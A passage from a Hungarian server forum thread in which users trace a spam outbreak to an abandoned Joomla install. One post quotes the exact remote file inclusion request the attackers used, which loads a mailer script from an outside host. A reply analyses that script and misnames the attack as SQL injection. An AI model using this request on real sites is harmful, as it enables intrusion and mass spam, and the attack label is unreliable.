Vissza   Szerver Fórum > Szerver > Egyéb szerver funkciók

Egyéb szerver funkciók minden más kiszolgáló szerepkör, mint SQL, DNS, FTP és MAIL szerver, stb.

Válaszol
 
Téma eszközök Megjelenítési módok

  #21  
Régi 2009-04-05, 18:44
g-easy logója
g-easy g-easy nem elérhető
Tag
 
Csatlakozott: 09-03-01
Hely: Túlon túl
Összes hozzászólás: 23
g-easy elindult a közkedveltség útján
Alapbeállítás

Megvan!

Egy régi elfeledett (és átirányított) aldomainen fent marad joomla (régi verzió) volt a bibi..

ezzel csinálták:

Kód:
/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://dark-solace.com/blog.txt??
__________________
mérleg
Válaszol idézettel

  #22  
Régi 2009-04-06, 11:38
Kefe logója
Kefe Kefe nem elérhető
ENTER gomb nyomó
 
Csatlakozott: 09-02-27
Hely: Budapest
Összes hozzászólás: 157
Kefe elindult a közkedveltség útján
Alapbeállítás

Megnéztem a hxxp://dark-solace.com/blog.txt címen lévő scriptet, hogy mit csinál (simán megnyithatod, ez csak egy txt fájl) és valóban ez egy email küldő progi: "PHP-Mailer by MICARI" Maga a script semmi mást nem csinál, csak email-eket lehet küldeni vele. Azt viszont sokat, távvezérléssel.
Rosszul beállított (magára hagyott) Joomla konfig tette lehetővé ezt az SQL injection támadást.

Továbbra is állítom, hogy azért tudott működni ez az email küldő script, mert a mail szerver open relay-ként működött.
(A script sima php mail() függvényt használ.) Ma reggel is ellenőriztem, mostmár nem ez a helyzet, úgy látszik sikerült tagnap beállítani.

Az más kérdés, hogy ez a sebezhetőség alkalmas (volt) arra, hogy bármilyen php script lefuttatható legyen, pl. iframe tag befecskendezése a weboldalra és hasonlók.

Gyakorlatilag dupla sebezhetőség vezetett a kálváriádhoz: meghekkelt Joomla és open relay mail szerver
__________________
---
Saját SEO szkriptek: Camelpark SEO centrum
Válaszol idézettel
Válaszol

Címkék
e-mail, hiba

Téma eszközök
Megjelenítési módok

Hozzászólás szabályai
You may not post new threads
You may not post replies
You may not post attachments
You may not edit your posts

BB code is bekapcsolva
Pofik bekapcsolva
Az [IMG] kód bekapcsolva
A HTML kód kikapcsolva

Fórum ugrás



A pontos idő 13:11 , a GMT +2 időzóna szerint.


Szerver hardver támogatónk Tárhely: Real.Com-94 hoszting
Powered by vBulletin®, Copyright © 2000 - 2019, Jelsoft Enterprises Ltd.